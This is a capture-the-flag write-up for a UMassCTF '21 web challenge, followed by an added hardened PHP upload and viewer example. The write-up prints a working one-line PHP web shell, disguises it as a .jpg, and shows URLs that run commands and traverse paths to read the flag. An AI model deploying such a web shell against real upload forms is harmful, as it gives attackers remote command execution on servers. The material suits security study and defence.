UMassCTF ’21: Web: Hermit – Part 1

This is for the UMassCTF ’21 CTF.

Challenge Author: Cobchise#6969

For this challenge, we are provided the following information:

Here is the hint:

Going to the provided link, we get this page:

I quickly test the image upload and see how it works:

It uploaded the file and gave a link to see it. When I click the link to see it, it essentially prints the contents of the file as if it is text:

This tells me that I need to upload a PHP shell script:

I grab my favorite one-line PHP shell and upload it as a .php file:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Okay, that didn’t work, so I change the extension to .jpg.

It took it:

When I click to see the “image” I get this:

Now I provide some commands as the expected “cmd” argument:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=pwd

Beautiful! I have a working shell. After some poking around, I find the flag:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=ls%20../../../home/hermit/flag
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=cat%20../../../home/hermit/flag/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}
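
The behaviour above, where PHP inside a .jpg runs when the file is viewed, is what happens when a viewer hands an uploaded file to the PHP interpreter instead of sending its bytes. As an added example (not the challenge's source, which this post does not show), here is a hardened upload handler and viewer; the include() cause, the function names, the storage path and the 16-hex-character ID format are assumptions.

```php
<?php
// Added example, not the challenge's code; names and paths are hypothetical.
// Assumption: the vulnerable viewer passed the stored file to include(),
// which runs any PHP block in the file regardless of its extension.

const UPLOAD_DIR = '/var/uploads';   // hypothetical; keep it outside the web root
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

// Upload side: judge the bytes, not the client-supplied name or extension.
function store_upload(string $tmpPath): string
{
    if (!is_uploaded_file($tmpPath)) {
        throw new RuntimeException('not an uploaded file');
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!is_string($mime) || !isset(ALLOWED[$mime]) || getimagesize($tmpPath) === false) {
        throw new RuntimeException('not an accepted image');
    }
    // Server-chosen random name; the extension follows the detected type.
    $id = bin2hex(random_bytes(8));
    if (!move_uploaded_file($tmpPath, UPLOAD_DIR . "/$id." . ALLOWED[$mime])) {
        throw new RuntimeException('could not store upload');
    }
    return $id;
}

// Viewer side: content checks can be fooled, so this is the part that matters.
// The file is streamed to the client and never handed to the interpreter.
function show_upload(string $id): void
{
    if (!preg_match('/\A[0-9a-f]{16}\z/', $id)) {   // rejects ../ and odd names
        http_response_code(400);
        return;
    }
    foreach (ALLOWED as $mime => $ext) {
        $path = UPLOAD_DIR . "/$id.$ext";
        if (is_file($path)) {
            header('Content-Type: ' . $mime);
            header('X-Content-Type-Options: nosniff');
            header('Content-Length: ' . filesize($path));
            readfile($path);   // raw bytes out; embedded PHP is not executed
            return;
        }
    }
    http_response_code(404);
}
```

With this viewer, a request carrying an extra cmd parameter changes nothing, because the stored file is only ever read and written to the response.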
